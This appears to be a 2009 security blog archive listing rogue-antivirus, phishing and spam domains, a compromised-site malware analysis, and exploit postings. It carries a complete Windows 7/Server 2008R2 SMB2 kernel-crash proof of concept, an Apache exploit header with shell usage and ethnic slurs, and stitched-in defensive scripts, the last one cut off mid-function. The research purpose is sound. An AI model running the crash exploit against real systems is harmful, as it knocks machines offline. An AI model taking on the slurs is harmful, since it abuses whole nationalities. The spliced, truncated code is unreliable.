Friday, November 27, 2009

Rogue Antivirus ** 27-Nov

IP Address: 91.207.116.55

10-open-davinci.com
advanced-virus-remover2010.com
advanced-virusremover-2009.com
advanced-virusremover-2010.com
advancedvirus-remover-2010.com
advancedvirusremover-2009.com
best-scan-pc.biz
best-scan-pc.com
best-scan-pc.net
best-scan.com
best-scan.net
best-scanpc.com
best-scanpc.net
best-scanpc.org
cathrynzfunz.com
coolcount1.com
downloadavr6.com
downloadavr7.com
downloadavr8.com
greatcrypt.com
hard-xxx-tube.com
mail.10-open-davinci.com
mail.advanced-virus-remover-2009.com
mail.advanced-virus-remover2010.com
mail.advanced-virusremover-2010.com
mail.advanced-virusremover2009.com
mail.advancedvirus-remover-2010.com
mail.advancedvirusremover-2009.com
mail.best-scan-pc.com
mail.best-scan-pc.net
mail.best-scan.com
mail.best-scan.net
mail.best-scanpc.org
mail.cathrynzfunz.com
mail.coolcount1.com
mail.downloadavr6.com
mail.downloadavr7.com
mail.downloadavr8.com
mail.greatcrypt.com
mail.hard-xxx-tube.com
mail.testavrdown.com
mail.testavrdownnew.com
mail.vscodec-pro.net
mail.vsproject.net
mail.xxx-white-tube.net
mail.xxx-white-tube.org
testavrdown.com
testavrdownnew.com
vscodec-pro.net
white-xxx-tube.com
www.advancedvirus-remover2009.com
www.advancedvirusremover-2009.com
www.best-scan-pc.com
www.best-scanpc.net
www.best-scanpc.org
www.hard-xxx-tube.com
www.onlinescanxppro.com
xxx-white-tube.org


IP Address: 87.98.254.201

fastzonescan-now.com
systemprotection-zone.com

IP Address: 88.198.239.161

my-protectedzone.net
static.88-198-239-161.clients.your-server.de
todozone-guard.com


IP Address: 93.174.95.135

experimentalways.com
handutilities.com
mail.experimentalways.com
mail.handutilities.com
mail.toolsand.com
mail.yourtoolscheap.com
ns1.handutilities.com
thesecurityutility.net
toolsand.com
www.dvdprotools.com
www.onlineworldcar.com
www.onlineworldtech.com
www.toolsand.com
www.yourtoolscheap.com
yourtoolscheap.com
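The per-IP listings in this post (and in the others on this page) follow one fixed layout: an "IP Address:" heading, a blank line, then one hostname per line, with wildcards, mail/www/ns labels and occasionally the hosting provider's own reverse-DNS name mixed in. The following Python script is an added example, not code from the blog: it parses that layout into ip -> hostnames, drops provider reverse-DNS names (they identify the server, not the campaign), and collapses the rest to registrable domains for a sinkhole list. It also handles the variant used later on the page where several IPs are listed under one heading. The excerpt it parses is constructed from a few of the entries above; TWO_LABEL_SUFFIXES is an assumed stopgap for the Public Suffix List.

```python
import re

# Constructed excerpt in the blog's own layout (entries taken from the lists
# above, including one hosting-provider reverse-DNS name).
SAMPLE_LISTING = """\
IP Address: 91.207.116.55

10-open-davinci.com
advanced-virus-remover2010.com
mail.advanced-virus-remover2010.com
www.onlinescanxppro.com


IP Address: 88.198.239.161

my-protectedzone.net
static.88-198-239-161.clients.your-server.de
todozone-guard.com
"""

IP_HEADING = re.compile(r'^IP Address:\s*(\d{1,3}(?:\.\d{1,3}){3})?\s*$')
BARE_IP = re.compile(r'^\d{1,3}(?:\.\d{1,3}){3}$')
HOSTNAME = re.compile(r'^(?:\*\.)?(?:[a-z0-9](?:[a-z0-9-]*[a-z0-9])?\.)+[a-z0-9]+$', re.I)

# Assumed stopgap: two-label public suffixes seen in these posts. A real tool
# should consult the Public Suffix List instead of a hard-coded set.
TWO_LABEL_SUFFIXES = {'com.ar', 'gov.ar', 'com.cn', 'net.cn', 'co.uk'}


def parse_listing(text):
    """Map each IP heading to the hostnames listed beneath it. A heading with no
    IP on the same line is followed by one IP per line; the names that follow
    are then attributed to every IP in that group."""
    groups = {}
    current_ips = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        m = IP_HEADING.match(line)
        if m or BARE_IP.match(line):
            if m:
                current_ips = [m.group(1)] if m.group(1) else []
            else:
                current_ips.append(line)
            for ip in current_ips:
                groups.setdefault(ip, [])
        elif HOSTNAME.match(line):
            for ip in current_ips:
                groups[ip].append(line.lower())
    return groups


def is_provider_ptr(name, ip):
    """Hosting providers publish reverse-DNS names that embed the server's IP
    (e.g. static.88-198-239-161.clients.your-server.de). Blocking those is
    pointless, so they are kept out of the list."""
    return ip.replace('.', '-') in name


def registrable_domain(name):
    """Collapse wildcard, www, mail and ns labels to the registrable domain."""
    labels = name.lstrip('*.').split('.')
    keep = 3 if '.'.join(labels[-2:]) in TWO_LABEL_SUFFIXES else 2
    return '.'.join(labels[-keep:])


def build_blocklist(text):
    """Sorted unique registrable domains from a listing, provider PTRs removed."""
    domains = set()
    for ip, names in parse_listing(text).items():
        for name in names:
            if not is_provider_ptr(name, ip):
                domains.add(registrable_domain(name))
    return sorted(domains)


def as_hosts_lines(domains):
    """Render the list as hosts-file sinkhole lines (0.0.0.0 is the usual sink)."""
    return ['0.0.0.0 %s' % d for d in domains]


if __name__ == '__main__':
    print('\n'.join(as_hosts_lines(build_blocklist(SAMPLE_LISTING))))
```

Lines that are not bare hostnames (the URL-with-path entries in some of the spam posts, or the one entry containing an "@") are silently skipped by HOSTNAME; extend the regex if those need to be kept.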

Microsoft IE - PDF invisibly embedded with your internal disk paths

A security researcher at SecureThoughts.com has published a privacy bug in PDFs produced from Internet Explorer. It occurs when IE is used to print a locally saved web page to a PDF writer, and it affects all IE versions, including the latest, IE 8.

Proof of Concept:

Steps to reproduce:
-------------------
1. Pick a .HTM, .HTML or .MHT file on your local computer.
2. Open this file in IE and press Ctrl-P, OR right-click the file in Explorer and select PRINT from the context menu.
3. Select any PDF writer as the printer, such as Adobe PDF / CutePDF / PrimoPDF / etc.
4. Click Print. When the PDF writer asks for a filename, provide any name.
5. Open the generated PDF in Notepad and search for "file://" without quotes.

Millions of PDFs found through Google are invisibly affected by this kind of bug.
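The last step above checks one PDF by hand in Notepad. The following Python script is an added example (not from the original post or from SecureThoughts) that automates the same check before a PDF is published: it searches the raw file for file:// URIs and also inflates FlateDecode-compressed streams, where a leaked path can sit without being visible in a text editor. The sample PDF is constructed inline; the user name and paths in it are made up.

```python
import re
import zlib

# file:// URIs as PDF writers emit them in /URI entries or page content when a
# locally saved .htm page is printed (e.g. file:///C:/Users/.../page.htm).
FILE_URI_RE = re.compile(rb'file:///?[^\s()<>"\']+')

# Body of every stream object; those that inflate as zlib data are searched too.
STREAM_RE = re.compile(rb'stream\r?\n(.*?)\r?\nendstream', re.DOTALL)


def find_file_uris(pdf_bytes):
    """Sorted unique file:// URIs found in the raw bytes and inside any
    FlateDecode stream of the PDF."""
    found = {m.group(0).decode('latin-1') for m in FILE_URI_RE.finditer(pdf_bytes)}
    for m in STREAM_RE.finditer(pdf_bytes):
        try:
            inflated = zlib.decompress(m.group(1))
        except zlib.error:
            continue  # not zlib data (uncompressed or another filter); raw pass covered it
        found.update(u.decode('latin-1') for u in FILE_URI_RE.findall(inflated))
    return sorted(found)


def local_paths(uris):
    """Strip the scheme so only the leaked local path remains:
    file:///C:/x.htm -> C:/x.htm, file:///home/u/x.htm -> /home/u/x.htm,
    file://server/share/x.htm -> server/share/x.htm (UNC)."""
    paths = []
    for u in uris:
        path = u[len('file://'):]
        if re.match(r'^/[A-Za-z]:', path):
            path = path[1:]  # drop the slash in front of a Windows drive letter
        paths.append(path)
    return paths


# Constructed sample PDF: one link annotation with a file:// URI in the clear
# and one Flate-compressed content stream with a second file:// URI inside it.
_HIDDEN_TEXT = b'BT /F1 12 Tf (saved from file:///C:/Users/alice/Documents/invoice.htm) Tj ET'
_DEFLATED = zlib.compress(_HIDDEN_TEXT)
SAMPLE_PDF = (
    b'%PDF-1.4\n'
    + b'1 0 obj\n<< /Type /Annot /Subtype /Link\n'
    + b'   /A << /S /URI /URI (file:///C:/Users/alice/Documents/invoice_files/logo.gif) >> >>\nendobj\n'
    + b'2 0 obj\n<< /Length ' + str(len(_DEFLATED)).encode() + b' /Filter /FlateDecode >>\n'
    + b'stream\n' + _DEFLATED + b'\nendstream\nendobj\n'
    + b'%%EOF\n'
)


if __name__ == '__main__':
    for p in local_paths(find_file_uris(SAMPLE_PDF)):
        print('leaked local path:', p)
```

Run it over a real file with `find_file_uris(open(path, 'rb').read())`; a non-empty result means the PDF should be regenerated (or the link annotations removed) before it leaves the machine.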


Reference:

Tuesday, November 24, 2009

MSN Phishing Site - GoMessenger Apps

I received an email from my friend enticing me to check who is blocking my MSN account on MSN Messenger. So obviously, my friend's MSN account was compromised to spread spam emails.


"Click Here" redirects the user to the "f2s8.gomessenger.net" phishing site.


IP Address: 77.67.5.12

*.recorta.com
canalquo.com
enlatierra.com
getpando.com
ierotico.com
imaxenes.com
mail.enlatierra.com
mail.getpando.com
mail.ierotico.com
mail.imaxenes.com
mail.music4life.net
mail.recorta.com
music4life.net
ns.ierotico.com
ns.imaxenes.com
ns.recorta.com
ns23.solucioneswebonline.com
ns41.solucioneswebonline.com
recorta.com
www.canalquo.com
www.ierotico.com
www.imaxenes.com
www.recorta.com


IP Address: 204.12.210.212

f2s8.gomessenger.net


IP Address: 200.32.8.145

200-32-8-145.prima.net.ar
4khosting.com
dwdsurfing.com
fmradiofonica.com.ar
gomessenger.net
herbomac.com.ar
mail.fmradiofonica.com.ar
mail.gomessenger.net
mail.herbomac.com.ar
mail.hiphopwear.com.ar
mail.libanoverde.com
mail.msnespia.com
mail.sanpedro.gov.ar
mail.termaldellago.com
mail.youareblocked.com
mail.zapasbasket.com
msnespia.com
ns.4khosting.com
ns.fmradiofonica.com.ar
ns.herbomac.com.ar
ns.hiphopwear.com.ar
ns.msnespia.com
ns.sanpedro.gov.ar
ns.youareblocked.com
ns1.4khosting.com
ns3.4khosting.com
sanpedro.gov.ar
www.4khosting.com
www.gomessenger.net
www.hiphopwear.com.ar
www.msnespia.com
www.sanpedro.gov.ar
www.youareblocked.com
youareblocked.com

Sunday, November 22, 2009

IE7 Denial of Service Exploit PoC

Reference: http://sebug.net/exploit/14956/
SSV ID:14956
SEBUG-Appdir:Internet Explorer
Published:2009-11-22

Wednesday, November 18, 2009

Spam ** 18-Nov-09

IP Address: 66.244.251.13

somexyz.com/funnyonfb?75z6
somexyz.com/funnyonfb?rl2b
somexyz.com/funnyonfb?yihi


IP Address: 74.53.201.82

twitpwr.com/xy9?8673
twitpwr.com/xy9?3091
twitpwr.com/xy9?1362
52.c9.354a.static.theplanet.com
dictionarywords.net
mymessiah.net
partiegirl.com
politicalfever.org
toponenetwork.com
twitpow.com
twitpwr.com
wifiworld.us
www.politicalfever.org
www.twitpwr.com
www.wordsearchfun.com


IP Address: 60.172.223.19

5c1adaf127.qiyeghh.cn
e4be.yetuvrf.cn
8be.lomigrv.cn
d46f.jiqajsl.cn
78c66.tilovyr.cn
992e.xupahgx.cn
703.luforjm.cn
172.luforjm.cn
e01a6600.belaxwb.cn
3f130a.mobuxgf.cn


IP Address: 122.116.32.126

hostmaster.now.to
now.to
nowtotest.com
www.now.to


IP Address: 60.172.210.3

*.iybvuvue.cn
barrington.steadybreak.com
bentham.steadywall.com
bibscreen.com
breakwin.com
darkfrom.com
intrigue.steadyblur.com
iybvuvue.cn
killjoy.steadybreak.com
linefollow.com
ns1.nicebob.com
ns2.countrydnsname.com
ns2.dnsgetonline.com
ns2.fullmountdns.com
ns2.grabdnsinfo.com
ns2.hostmasterpro.com
ns2.linkdnspowersetup.com
ns2.linkdnssetup.com
ns2.roadhostdns.com
ns2.skyhostingpower.com
ns2.wallpaperdns.com
ns2.wishstardns.com
ns2.worlddnstype.com
towelnow.com
www.iybvuvue.cn
alesign.com
bigger-yourpenis.com
breakwin.com
btokitkv.cn
bvtibots.cn
darkfrom.com
frcappgs.cn
frcappoi.cn
hourtank.com
ivuotjus.cn
izxacrua.cn
linefollow.com
linkdnssetup.com
needsand.com
penispi11.com
roadhostdns.com
rolexoffertoday.com
skyeclean.com
wishstardns.com


IP Address: 218.10.16.108

*.iybvuvue.cn
acaieliteweight.com
iybvuvue.cn
www.iybvuvue.cn

IP Address: 201.7.103.58

*.ahpezkut.com
*.atquackephix.com
*.beststoremedswellbeing.com
*.bihdeawy.com
*.foxwyqwac.com
*.fyenpimbec.net
*.glagsyclax.com
*.healthenlargementpill.com
*.hlaedoahma.com
*.hlevombyx.com
*.hovhanjal.com
*.pharmacystonetablets.com
*.qubcicvowy.net
*.qukmifnuo.com
*.qwyzkiegwy.com
*.sohfevevyl.com
*.yupdytytix.com
alhilfaika.com
behmaibkan.com
bestdrugtorepills.com
beststoremedswellbeing.com
bestviagrarx.com
bihdeawy.com
cviadoaz.com
djiatisfu.com
dwocefhial.com
ebsajgij.com
ezloxjib.com
fisysdubb.com
fufyhzeyjhi.com
fyenpimbec.com
fyenpimbec.net
fyxaohziju.com
glagsyclax.com
goxtixunas.net
gyghoisre.com
healthenlargementpill.com
healthfoodmedsguide.com
hlevombyx.com
homru.com
hovhanjal.com
kidqurax.com
lsnlue.redsouk.com
lusfidbeu.com
lyplumudwub.com
mail.aexhagijho.com
mail.ahpezkut.com
mail.bestdrugtorepills.com
mail.beststoremedswellbeing.com
mail.bihdeawy.com
mail.djiatisfu.com
mail.ezloxjib.com
mail.foxwyqwac.com
mail.foxwyqwac.net
mail.fyenpimbec.com
mail.fyenpimbec.net
mail.glagsyclax.com
mail.greatpillreview.com
mail.healthenlargementpill.com
mail.hlevombyx.com
mail.hovhanjal.com
mail.pharmacystonetablets.com
mail.qubcicvowy.net
mail.qwyzkiegwy.com
mail.sohfevevyl.com
merfeget.com
ns1.aexhagijho.com
ns1.atquackephix.com
ns1.beststoremedswellbeing.com
ns1.bihdeawy.com
ns1.ekhahpaxen.net
ns1.ezloxjib.com
ns1.fisysdubb.com
ns1.foxwyqwac.net
ns1.fufyhzeyjhi.com
ns1.fyenpimbec.com
ns1.glagsyclax.com
ns1.goxtixunas.net
ns1.healthfoodmedsguide.com
ns1.hlevombyx.com
ns1.pharmacystonetablets.com
ns1.qubcicvowy.net
ns1.qwyzkiegwy.com
ns1.zmigtyby.com
ns2.aexhagijho.com
ns2.ahpezkut.com
ns2.atquackephix.com
ns2.behmaibkan.com
ns2.bestdrugtorepills.com
ns2.beststoremedswellbeing.com
ns2.bihdeawy.com
ns2.ekhahpaxen.net
ns2.foxwyqwac.com
ns2.fyenpimbec.com
ns2.fyenpimbec.net
ns2.glagsyclax.com
ns2.goxtixunas.net
ns2.greatpillreview.com
ns2.healthenlargementpill.com
ns2.healthfoodmedsguide.com
ns2.hlaedoahma.com
ns2.hlevombyx.com
ns2.pharmacystonetablets.com
ns2.qubcicvowy.net
ns2.qwyzkiegwy.com
ns2.yupdytytix.com
ns2.zmigtyby.com
pharmacystonetablets.com
qubcicvowy.net
qwiquhvyrumy.com
qwofyuhl.net
qwyzkiegwy.com
redsouk.com
skajhewsypy.com
tuamecwojl.com
tuftiqwime.com
viahwanmu.com
vnoedcyl.net
xyhjapquf.net
yezuynbez.com
zvymmogwu.net
beststoremedswellbeing.com
goxtixunas.net
qubcicvowy.net
zmigtyby.com
yupnyojrufl.com
yovneynmap.com
www.iwrlyoue.cn


IP Address: 60.172.210.4

*.bjogivos.cn
*.cbuhovig.cn
*.ddekowim.cn
*.dimaxal.cn
*.djubatuj.cn
*.gguwelag.cn
*.gnaburen.cn
*.gpucivek.cn
*.hfizipan.cn
*.hlapowoc.cn
*.jagegop.cn
*.jduridew.cn
*.jogawaw.cn
*.kqadibul.cn
*.lxucubaf.cn
*.nevutud.cn
*.nwurakex.cn
*.nxugiral.cn
*.pnunidun.cn
*.psavapip.cn
*.pxefidag.cn
*.pzuqeleh.cn
*.qgohogok.cn
*.rikanoj.cn
*.rwihopot.cn
*.slujarug.cn
*.sxopiken.cn
*.ttanames.cn
*.vsaqifuj.cn
*.xlejuwof.cn
*.yveqekov.cn
*.zsojexuh.cn
*.zsumuhey.cn
*.zxatuyox.cn
0cb26.jduridew.cn
178.zsezukes.cn
2002.vkalufor.cn
230951.gcuzipoj.cn
2edb5.jogawaw.cn
303190.jyasuhev.cn
3293ae.bjexipat.cn
38b680.xreyupuc.cn
402.zulapep.cn
428c.ntademef.cn
4ea6.pzuqeleh.cn
51cf.xpasetad.cn
523.fmacinuy.cn
532b.jjobijen.cn
5965a.sxuzejaf.cn
5c563.cquconej.cn
66d2f3.gzuvafuz.cn
66ead0.qnabefuc.cn
68e4a.gxohudet.cn
6bf8.nxugiral.cn
702.rwihopot.cn
8a4695.txusinuf.cn
8acc.zsumuhey.cn
90c06.dkaxirey.cn
9340e.zcuxedoc.cn
9d8d1.bjidasut.cn
b1ec.hlapowoc.cn
b26.nwifiwed.cn
b555.gnaburen.cn
ba94.rwukison.cn
benefit.gyefocev.cn
bj9.ru
borngentle.com
c852.cvupuqal.cn
d11.hfizipan.cn
d57e8.klosoqiw.cn
dc7f.qgapefey.cn
e75.jagegop.cn
eb0.pxefidag.cn
eef56.lyalojuf.cn
everest.qdegivah.cn
f984.jnomariq.cn
gguwelag.cn
gxohudet.cn
hlapowoc.cn
jagegop.cn
jyasuhev.cn
klosoqiw.cn
kmakafum.cn
lqafokuw.cn
lxucubaf.cn
mhuhafuy.cn
movement.qlonipaf.cn
nevutud.cn
ntademef.cn
overal.wsemuhin.cn
pxefidag.cn
pyonelul.cn
qcesipof.cn
qforuhum.cn
rikanoj.cn
rkujalal.cn
rwihopot.cn
sxopiken.cn
sxuzejaf.cn
vkalufor.cn
www.ddekowim.cn
www.lxucubaf.cn
www.slujarug.cn
www.zziduxux.cn
xcopidox.cn
xehicaw.cn
xlejuwof.cn
xreyupuc.cn
xzewutos.cn
ysuyonoh.cn
yveqekov.cn
zicorem.cn
zsezukes.cn
zulapep.cn
zziduxux.cn
www.sokubpq.cn
www.wuxezgr.cn
www.johicfy.cn
www.yogerht.cn
www.mitugwy.cn
www.jeraysw.cn


IP Address: 60.172.210.5

*.8888r.com
*.baidugame.cn
*.hondy.net
*.sf66666.com
*.wuhu365.com
1maile.com
51jsbbs.com
7cspk.com
8888r.com
ahfcst.com
ahhaopu.com
bu2007.com
fagao888.com
fcjstz.com
gyljf.com
hkyurun.com
hnjpt.com
hzshuiyun.com
jcfw2008.com
nlaixin.com
nojetpm.com
nxspxx.com
rijinmuju.com
sylzgy.com
szsdck.com
weinotts.com
whcbzs.com
whyrhz.com
wuhu365.cn
wuhu365.com
wuhucrm.cn
wuhugogo.com
wuhumail.com
wuhuprinter.com
www.wuhu365.com
xinyuemusic.com
xn--49ss1hl9pext.com
yjgafj.com


IP Address: 60.172.210.2

0514pet.cn
075700.com
jsbabys.cn
nntao.net
www.0514pet.cn
www.jsbabys.cn
www.jxqb.com

IP Address: 208.67.219.132

www.@securerxpharm.com
goowy.net
iris-germany.com
quienestadetrasdelascuarderias.org
www.iiujpoue.cn
www.iqegweue.cn
www.igfgxlue.cn

IP Address: 124.217.214.22

naturalmeed.com

Monday, November 16, 2009

Apache 2.2.0 - 2.2.11 Remote exploit

/*  ========   !THIS 0DAY EXPLOIT IS PRIVATE PLEASE DO NOT DISTRIBUTE! =================
Apache 2.2.0 - 2.2.11 Remote exploit
Exploiting an off-by-one bug in apr_uri_parse_hostinfo() which leads to allocation of an
arbitrary amount of memory; put the shellcode there, then reliably jump in upon invocation
of the APR callback.

Compile: gcc fuckapache.c -o fuckapache
Usage: ./fuckapache
E.g:
===========================================================
[test@localhost tmp]$ ./fuck localhost 80
Connected, sending out the evil request...
Waiting some seconds to see if we got shell...
Now type nc localhost 12345 to see if you've got shell there
[test@localhost tmp]$ nc localhost 12345
id
uid=48(apache) gid=48(apache) groups=48(apache)
^D
==========================================================

Fuck all script kiddies around the world. No more free bugs, get lost.

Fuck all Indonesian, Malaysian, Pakistani, Saudi, Marrocan, Nigerian,
Turkish and other third-world *hack3rz* whose only contribution to the
world is writing dummy sqli scripts in python flooding the net
with BS like "kekekekeke" "ajjajaja" "i kill you". 
Feel free to suck my balls, all of you.

Have phun :)

*/

#include <stdio.h>   /* printf */
#include <stdlib.h>  /* exit */
/* only the headers this fragment needs; the full source is linked below */

void usage(char *argv[])
{
    printf("Usage: %s  \n\n",argv[0]);
    exit(1);
}

The full script can be obtained from http://pastebin.com/f5571e439
Reference: http://sebug.net/exploit/12636/ [broken link]

Friday, November 13, 2009

Education website compromised to host rogue antiviraprof2009.com

Today my readers sent me an email reporting that their university website had been compromised to host malicious code. An iframe linking to "hxxp://davtraff.com/lib/index.php" was inserted into the main page.

Note: A second visit to a similarly compromised website redirects users to a Google page.


"hxxp://davtraff.com/lib/index.php" contains obfuscated exploit code (CVE-2006-0003) that redirects to another link on "213.163.89.54" to download the rogue AV installer "e0ab531ec312161511493b002f9be2ee.exe", which is detected as "SpywareGuard2008" by Symantec.

The ThreatExpert report summary for "e0ab531ec312161511493b002f9be2ee.exe"

In addition, a malicious PDF file, an Adobe Flash file and a Java class file were downloaded to make modifications to the victim's system. Those files have a low detection rate in the VirusTotal analysis reports.

28_firstSomeLooks.pdf Virustotal Report
29_freeLooks.swf Virustotal Report
30_useGoingBook.class Virustotal Report
31_firstSomeLooks.pdf Virustotal Report

This time, the exploits used in the crafted PDF are:
- Adobe util.printf overflow CVE-2008-2992
- Adobe getIcon CVE-2009-0927

Below is a screenshot of the Antivirus System Pro rogue that gets installed on the victim's system under the process name "jfppsysguard.exe" (Trojan); it has a low detection rate of 7/41 on VirusTotal (Virustotal Report).



hxxp://antiviraprof2009.com

In addition, the HOSTS file was updated with the following hostname-to-IP mappings:
********************************************************
127.0.0.1 localhost
::1 localhost
91.212.127.227 antiviraprof2009.microsoft.com
91.212.127.227 antiviraprof2009.com
91.212.127.227 www.antiviraprof2009.com
********************************************************

Domains and IP address involved:
- davtraff.com -> 213.163.89.54
- antiviraprof2009.com -> 193.169.12.50
- 91.212.127.227
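The HOSTS entries above are exactly the kind of change a host audit should catch: a lookalike subdomain of microsoft.com and the rogue's own domain all pinned to one public IP. The following Python checker is an added example, not part of the original post, that parses a hosts file and flags every entry that pins a name to something other than loopback. The recovered HOSTS content quoted above is used as its sample input; PROTECTED_DOMAINS is an assumed list of domains an organisation never expects to see pinned, not something from the post.

```python
import ipaddress

# HOSTS file content recovered from the infected machine (copied from the post
# above), used here as the sample input.
SAMPLE_HOSTS = """\
127.0.0.1 localhost
::1 localhost
91.212.127.227 antiviraprof2009.microsoft.com
91.212.127.227 antiviraprof2009.com
91.212.127.227 www.antiviraprof2009.com
"""

# Names that must only ever resolve to loopback.
LOOPBACK_NAMES = {'localhost', 'localhost.localdomain'}

# Assumed, not from the post: domains an organisation never expects to see pinned
# in a hosts file. Rogue AV pins lookalike subdomains of these to look legitimate.
PROTECTED_DOMAINS = ('microsoft.com', 'windowsupdate.com', 'symantec.com')


def parse_hosts(text):
    """Return [(ip_address, [names])] for every data line. Comments after '#'
    and lines whose first field is not an IP are skipped."""
    entries = []
    for raw in text.splitlines():
        line = raw.split('#', 1)[0].strip()
        if not line:
            continue
        fields = line.split()
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue
        entries.append((ip, fields[1:]))
    return entries


def _under(name, domain):
    return name == domain or name.endswith('.' + domain)


def audit_hosts(text):
    """Return (name, ip, reason) for each entry that steers resolution away from
    loopback. Pins to 127.0.0.1 / ::1 / 0.0.0.0 are normal (blocklists use them);
    pins to private addresses are common in enterprises and are not reported
    unless the name is localhost or a protected domain."""
    findings = []
    for ip, names in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue
        for name in names:
            n = name.lower()
            if n in LOOPBACK_NAMES:
                reason = 'localhost hijacked to non-loopback address'
            elif any(_under(n, d) for d in PROTECTED_DOMAINS):
                reason = 'protected domain pinned in hosts file'
            elif ip.is_global:
                reason = 'public IP pinned in hosts file'
            else:
                continue
            findings.append((name, str(ip), reason))
    return findings


if __name__ == '__main__':
    for name, ip, reason in audit_hosts(SAMPLE_HOSTS):
        print('%-40s %-16s %s' % (name, ip, reason))
```

On a live system read the file from `C:\Windows\System32\drivers\etc\hosts` (or `/etc/hosts`) and feed its text to `audit_hosts`; the three findings produced for the sample are the same three lines the rogue added above.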

Domains sharing same IP address "213.163.89.54"

*.davtraff.com
*.edcomparison.com
*.fuadrenal.com
*.google-analyze.cn
*.google-analyze.org
*.m-analytics.net
*.odile-marco.com
*.odmarco.com
*.reycross.cn
*.reycross.com
*.yahoo-analytics.net
57yq57.davtraff.com
7mzkrq.davtraff.com
davtraff.com
edcomparison.com
fuadrenal.com
fzfaw6.davtraff.com
google-analyze.org
kembe2.davtraff.com
m-analytics.net
odmarco.com
reycross.cn
reycross.com
statanalyze.cn
www.davtraff.com
www.edcomparison.com
www.m-analytics.net
www.odile-marco.com
www.odmarco.com
www.reycross.cn
www.reycross.com
www.yahoo-analytics.net
yahoo-analytics.net

Domains sharing same IP address "193.169.12.50"

coantivirus.com
euroantivirus.com
ns1.coantivirus.com
ns1.euroantivirus.com
ns1.os-secure2009.com
ns1.winsecure2009.com
ns1.winwarepro.com
os-secure2009.com
winsecure2009.com
winwarepro.com
www.coantivirus.com
www.os-secure2009.com
www.winsecure2009.com
www.winwarepro.com

Thanks
--X0end

Windows 7/Server 2008RC Remote Kernel Crash - Zero Day Exploit

Reference: http://g-laurent.blogspot.com

Advisory:

=============================================
- Release date: November 11th, 2009
- Discovered by: Laurent Gaffié
- Severity: Medium/High
=============================================

I. VULNERABILITY
-------------------------
Windows 7 * , Server 2008R2 Remote Kernel Crash

II. BACKGROUND
-------------------------
#FAIL,#FAIL,#FAIL
SDL FAIL, 'Most Secure Os Ever' --> Remote Kernel in 2 mn.
#FAIL,#FAIL,#FAIL

III. DESCRIPTION
-------------------------
See : http://g-laurent.blogspot.com/ for much more details

#Comment: This bug is specific to Windows 7/2008R2.

IV. PROOF OF CONCEPT
-------------------------
#win7-crash.py:
#Trigger a remote kernel crash on Win7 and server 2008R2 (infinite loop)
#Crash in KeAccumulateTicks() due to NT_ASSERT()/DbgRaiseAssertionFailure() caused by an infinite loop.
#NO BSOD, YOU GOTTA PULL THE PLUG.
#To trigger it fast; from the target: \\this_script_ip_addr\BLAH , instantly crash
#Author: Laurent Gaffié
#

import SocketServer

packet = ("\x00\x00\x00\x9a" # ---> length should be 9e not 9a..
"\xfe\x53\x4d\x42\x40\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00"
"\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x41\x00\x01\x00\x02\x02\x00\x00\x30\x82\xa4\x11\xe3\x12\x23\x41"
"\xaa\x4b\xad\x99\xfd\x52\x31\x8d\x01\x00\x00\x00\x00\x00\x01\x00"
"\x00\x00\x01\x00\x00\x00\x01\x00\xcf\x73\x67\x74\x62\x60\xca\x01"
"\xcb\x51\xe0\x19\x62\x60\xca\x01\x80\x00\x1e\x00\x20\x4c\x4d\x20"
"\x60\x1c\x06\x06\x2b\x06\x01\x05\x05\x02\xa0\x12\x30\x10\xa0\x0e"
"\x30\x0c\x06\x0a\x2b\x06\x01\x04\x01\x82\x37\x02\x02\x0a")


class SMB2(SocketServer.BaseRequestHandler):

    def handle(self):

        print "Who:", self.client_address
        print "THANKS SDL"
        input = self.request.recv(1024)
        self.request.send(packet)
        self.request.close()

launch = SocketServer.TCPServer(('', 445),SMB2)# listen all interfaces port 445
launch.serve_forever()



V. BUSINESS IMPACT
-------------------------
An attacker can remotely crash any Windows 7/Server 2008R2
on a LAN or via IE

VI. SYSTEMS AFFECTED
-------------------------
Windows 7, Windows Server 2008R2

VII. SOLUTION
-------------------------
No patch available for the moment; your vendor does not care.
Close the SMB feature and ports until a real audit is provided.

VIII. REFERENCES
-------------------------
http://blogs.msdn.com/sdl/

IX. CREDITS
-------------------------
This vulnerability has been discovered by Laurent Gaffié
Laurent.gaffie{remove-this}(at)gmail.com

X. REVISION HISTORY
-------------------------
November 8th, 2009: MSRC contacted
November 8th, 2009: MSRC acknowledged the vuln
November 11th, 2009: MSRC tries to convince me that the multi-vendor-ipv6 bug shouldn't appear in a security bulletin.
November 11th, 2009: Win 7 remote kernel smash released

XI. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is"
with no warranties or guarantees of fitness of use or otherwise.
I accept no responsibility for any damage caused by the use or
misuse of this information.

XII.Personal Notes
-------------------------
More Remote Kernel FD @MS to come.
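The PoC in the advisory above answers an SMB2 NEGOTIATE with a NetBIOS session header whose length field (0x9a) does not match the bytes that actually follow (0x9e, as the author's own comment on the packet notes). The following Python helper is an added example, not part of the advisory or its PoC: it is the check a network sensor or pcap triage script can apply to traffic on TCP 445, parsing the 4-byte NetBIOS session header and the fixed 64-byte SMB2 header (layout per MS-SMB2) and flagging frames whose declared length disagrees with the payload. The sample frames are constructed inline (a zero-filled NEGOTIATE response body of the same total size), not the PoC's bytes.

```python
import struct

# SMB2 header constants (MS-SMB2): protocol id, fixed header size, the
# NEGOTIATE command code and the flag bit marking a server response.
SMB2_MAGIC = b'\xfeSMB'
SMB2_HEADER_SIZE = 64
SMB2_NEGOTIATE = 0x0000
SMB2_FLAGS_SERVER_TO_REDIR = 0x00000001


def inspect_netbios_frame(frame):
    """Parse one NetBIOS session-service frame (1 type byte + 3-byte big-endian
    length, then the payload). Reports whether the declared length matches the
    bytes present and, if the payload is SMB2, the command and direction."""
    if len(frame) < 4:
        raise ValueError('frame shorter than the NetBIOS session header')
    msg_type = frame[0]
    declared = int.from_bytes(frame[1:4], 'big')
    payload = frame[4:]
    info = {
        'declared_len': declared,
        'actual_len': len(payload),
        'length_ok': declared == len(payload),
        'smb2': False,
    }
    if msg_type == 0x00 and payload[:4] == SMB2_MAGIC and len(payload) >= SMB2_HEADER_SIZE:
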